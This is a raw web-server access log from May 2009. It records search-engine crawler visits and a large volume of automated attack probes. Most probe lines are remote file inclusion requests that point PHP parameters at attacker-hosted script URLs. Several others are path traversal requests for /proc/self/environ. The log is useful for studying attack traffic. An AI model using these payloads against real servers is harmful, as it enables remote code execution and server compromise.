212.227.63.136 - - [14/May/2009:07:49:32 -0500] "GET /logs/access_log.1236384000///sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.106.144 - - [14/May/2009:07:49:59 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.239.76.25 - - [14/May/2009:07:51:22 -0500] "GET /logs/access_log.1235174400//skin/zero_vote/login.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:07:52:37 -0500] "GET /logs/access_log.1118448000 HTTP/1.1" 200 661 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.227.63.136 - - [14/May/2009:07:53:33 -0500] "GET /logs/access_log.1240012800///sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:55:41 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:55:41 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:55:41 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:07:55:41 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.44.79.35 - - [14/May/2009:07:56:09 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 348 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
218.38.243.71 - - [14/May/2009:07:56:40 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:07:56:41 -0500] "GET /logs/access_log.1237680000//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:07:56:42 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:07:56:50 -0500] "GET /logs/access_log.1237680000//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:07:56:50 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:07:56:52 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:07:58:51 -0500] "GET //?path%5Bdocroot%5D=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:07:58:51 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:07:58:54 -0500] "GET /logs//?path%5Bdocroot%5D=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 200 189322 "-""Mozilla/5.0"
195.221.67.50 - - [14/May/2009:07:58:56 -0500] "GET /logs/access_log.1230768000///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.221.67.50 - - [14/May/2009:07:58:56 -0500] "GET ///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.221.67.50 - - [14/May/2009:07:58:56 -0500] "GET /logs/access_log.1229299200///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.221.67.50 - - [14/May/2009:07:58:56 -0500] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:00:03 -0500] "GET /logs/access_log.1239753600//?path%5Bdocroot%5D=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:08:00:13 -0500] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:08:00:13 -0500] "GET ///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:08:00:13 -0500] "GET /logs/access_log.1230768000///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:08:00:13 -0500] "GET /logs/access_log.1229299200///tools/send_reminders.php?noSet=0&includedir=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
91.202.4.158 - - [14/May/2009:08:00:43 -0500] "GET /show.php?path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.202.4.158 - - [14/May/2009:08:00:43 -0500] "GET /logs/show.php?path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.202.4.158 - - [14/May/2009:08:00:44 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.202.4.158 - - [14/May/2009:08:00:44 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.202.4.158 - - [14/May/2009:08:00:44 -0500] "GET /logs/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 296 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:08:00:44 -0500] "GET /show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 291 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:08:00:44 -0500] "GET /logs/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:08:00:45 -0500] "GET /show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""XXXXXX"
213.251.169.83 - - [14/May/2009:08:01:52 -0500] "GET /?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
213.251.169.83 - - [14/May/2009:08:01:53 -0500] "GET /logs/?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189317 "-""libwww-perl/5.803"
217.18.76.16 - - [14/May/2009:08:03:08 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:08:03:09 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 200 189322 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:08:03:29 -0500] "GET /logs/access_log.1133740800 HTTP/1.1" 200 130 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.172 - - [14/May/2009:08:03:30 -0500] "GET /logs/access_log.1173312000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.215.4.114 - - [14/May/2009:08:03:51 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
67.215.4.114 - - [14/May/2009:08:03:52 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 200 189322 "-""libwww-perl/5.825"
211.110.19.178 - - [14/May/2009:08:05:44 -0500] "GET /logs//skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:08:05:44 -0500] "GET /logs/access_log.1235520000//skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:08:05:44 -0500] "GET //skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:08:07:16 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189322 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:08:07:16 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
218.38.243.71 - - [14/May/2009:08:07:52 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:08:08:04 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:08:08:28 -0500] "GET /logs/access_log.1136419200 HTTP/1.1" 200 331 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:08:09:57 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189322 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:08:09:57 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:08:09:58 -0500] "GET /logs//?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 189322 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:08:09:58 -0500] "GET /logs//?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 189322 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:08:09:58 -0500] "GET //?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:08:09:58 -0500] "GET //?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
64.118.90.253 - - [14/May/2009:08:10:08 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:10:08 -0500] "GET //index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:10:40 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:10:40 -0500] "GET //index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.823"
217.18.76.16 - - [14/May/2009:08:11:02 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189322 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:08:11:03 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
193.138.206.192 - - [14/May/2009:08:11:13 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189322 "-""libwww-perl/5.811"
193.138.206.192 - - [14/May/2009:08:11:13 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
124.0.54.98 - - [14/May/2009:08:11:41 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:11:41 -0500] "GET /logs/access_log.1239494400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:11:41 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:11:54 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:08:13:34 -0500] "GET /logs/access_log.1177286400 HTTP/1.1" 200 327 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.118.90.253 - - [14/May/2009:08:13:55 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:13:55 -0500] "GET //index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.823"
200.107.138.34 - - [14/May/2009:08:15:01 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189322 "-""libwww-perl/5.79"
200.107.138.34 - - [14/May/2009:08:15:01 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
64.118.90.253 - - [14/May/2009:08:15:31 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:15:31 -0500] "GET //index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.823"
218.150.79.146 - - [14/May/2009:08:15:57 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:08:15:57 -0500] "GET //modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:08:15:57 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:08:16:31 -0500] "GET /logs/access_log.1233792000//modules/xfsection/modify.php?dir_module=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.118.90.253 - - [14/May/2009:08:17:28 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:17:28 -0500] "GET //index2.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.823"
66.249.67.180 - - [14/May/2009:08:19:20 -0500] "GET /logs/access_log.1137715200 HTTP/1.1" 200 461 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.1.64.133 - - [14/May/2009:08:19:50 -0500] "GET /logs/content/modify_go.php?pwfile=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [14/May/2009:08:19:50 -0500] "GET /content/modify_go.php?pwfile=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [14/May/2009:08:19:50 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.1.64.133 - - [14/May/2009:08:19:50 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.1.64.133 - - [14/May/2009:08:19:51 -0500] "GET /logs/content/modify_go.php?pwfile=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 309 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:08:19:51 -0500] "GET /content/modify_go.php?pwfile=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 304 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:08:19:51 -0500] "GET /content/modify_go.php?pwfile=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:08:19:51 -0500] "GET /logs/content/modify_go.php?pwfile=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""XXXXXX"
219.94.148.39 - - [14/May/2009:08:23:32 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:23:32 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:23:32 -0500] "GET //modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:24:11 -0500] "GET /logs/access_log.1233792000//modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:25:46 -0500] "GET /logs/access_log.1235779200//index.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:25:46 -0500] "GET //index.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:25:46 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:25:55 -0500] "GET /errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:25:55 -0500] "GET /logs/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:25:55 -0500] "GET /logs/access_log.1235779200/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:26:00 -0500] "GET /logs/access_log.1235347200//index.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:26:10 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:08:26:34 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:26:34 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:26:51 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:26:51 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
122.153.212.195 - - [14/May/2009:08:26:59 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.141 - - [14/May/2009:08:27:00 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.153.212.195 - - [14/May/2009:08:27:04 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:27:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:08:27:17 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:18 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:34 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:34 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:35 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:35 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:55 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:55 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:59 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:27:59 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
202.75.4.169 - - [14/May/2009:08:28:01 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.57.79.26 - - [14/May/2009:08:28:05 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:28:05 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
